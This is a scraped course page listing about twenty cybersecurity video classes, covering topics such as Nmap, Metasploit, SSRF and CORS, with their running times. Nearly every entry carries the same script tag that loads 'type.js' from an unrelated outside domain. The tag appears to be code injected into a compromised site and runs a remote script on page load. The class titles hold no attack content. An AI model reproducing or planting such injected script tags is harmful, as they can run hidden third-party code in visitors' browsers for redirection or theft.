Classes
Introduction to Cyber Security
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Introduction to Cyber Security
22:54 -
Basic Cyber Ethics
55:45
Advanced Ethical Hacking
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Advanced Ethical Hacking
57:06
Techniques and procedures
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Techniques and Procedures
47:17
Host Header Attack
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Class 5
40:42
Server Side Request Forgery
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
class 6
59:07
Advanced Authentication Variability
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Class 7
39:36
Cross-Origin Resource Sharing
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
class 8
35:30
Business logic vulnerabilities
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
class 9
40:25
CORS Vulnerability
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Class 10
35:58
Linux Basic Commands
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Class 11
36:00
Linux Basic Commands Continuation
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Class 12
37:38
Reconnaissance in Cyber Security
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Class 13
38:16
Nmap
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Class 14
38:32
Metasploit
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Class 15
42:45
Vyatta Network
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
class 16
42:35
Targets
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
class 17
57:47
Reporting
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
class 18
56:18
Cyber Threat Hunting
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
class 19
37:45
Doubts Clearing
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
class 20
39:59
Cybersecurity (December)
